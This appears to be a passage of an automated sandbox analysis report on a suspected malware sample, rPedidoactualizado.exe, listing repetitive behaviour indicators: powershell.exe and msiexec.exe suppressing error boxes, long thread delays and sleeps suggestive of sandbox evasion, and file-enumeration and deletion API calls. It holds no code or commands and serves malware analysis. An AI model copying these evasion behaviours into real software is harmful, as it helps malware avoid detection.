          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599890Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599781Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599671Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599562Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599453Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599343Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599234Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599124Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599015Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598906Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598796Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598687Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598578Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598465Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598359Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598249Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598140Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598031Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597921Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597812Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597702Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597593Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597484Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597374Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597265Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597156Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597046Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596937Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596828Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596718Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596609Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596499Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596390Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596281Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596171Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596062Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595952Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595843Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595734Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595624Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595515Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595406Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595296Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595187Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595077Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594968Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594859Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594749Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594640Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7430Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2159Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1476Thread sleep time: -3689348814741908s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600Thread sleep time: -25825441703193356s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600Thread sleep time: -600000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600Thread sleep time: -599890s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6476Thread sleep count: 1072 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6476Thread sleep count: 8789 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600Thread sleep time: -599781s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600Thread sleep time: -599671s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600Thread sleep time: -599562s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600Thread sleep time: -599453s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600Thread sleep time: -599343s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600Thread sleep time: -599234s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600Thread sleep time: -599124s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600Thread sleep time: -599015s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600Thread sleep time: -598906s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600Thread sleep time: -598796s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600Thread sleep time: -598687s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600Thread sleep time: -598578s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600Thread sleep time: -598465s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600Thread sleep time: -598359s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600Thread sleep time: -598249s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600Thread sleep time: -598140s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600Thread sleep time: -598031s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600Thread sleep time: -597921s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600Thread sleep time: -597812s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600Thread sleep time: -597702s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600Thread sleep time: -597593s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600Thread sleep time: -597484s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600Thread sleep time: -597374s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600Thread sleep time: -597265s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600Thread sleep time: -597156s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600Thread sleep time: -597046s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600Thread sleep time: -596937s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600Thread sleep time: -596828s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600Thread sleep time: -596718s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600Thread sleep time: -596609s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600Thread sleep time: -596499s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600Thread sleep time: -596390s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600Thread sleep time: -596281s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600Thread sleep time: -596171s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600Thread sleep time: -596062s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600Thread sleep time: -595952s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600Thread sleep time: -595843s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600Thread sleep time: -595734s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600Thread sleep time: -595624s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600Thread sleep time: -595515s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600Thread sleep time: -595406s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600Thread sleep time: -595296s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600Thread sleep time: -595187s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600Thread sleep time: -595077s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600Thread sleep time: -594968s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600Thread sleep time: -594859s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600Thread sleep time: -594749s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5600Thread sleep time: -594640s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\rPedidoactualizado.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
          Source: C:\Users\user\Desktop\rPedidoactualizado.exeCode function: 0_2_004065DA FindFirstFileW,FindClose,0_2_004065DA
          Source: C:\Users\user\Desktop\rPedidoactualizado.exeCode function: 0_2_004059A9 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004059A9
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
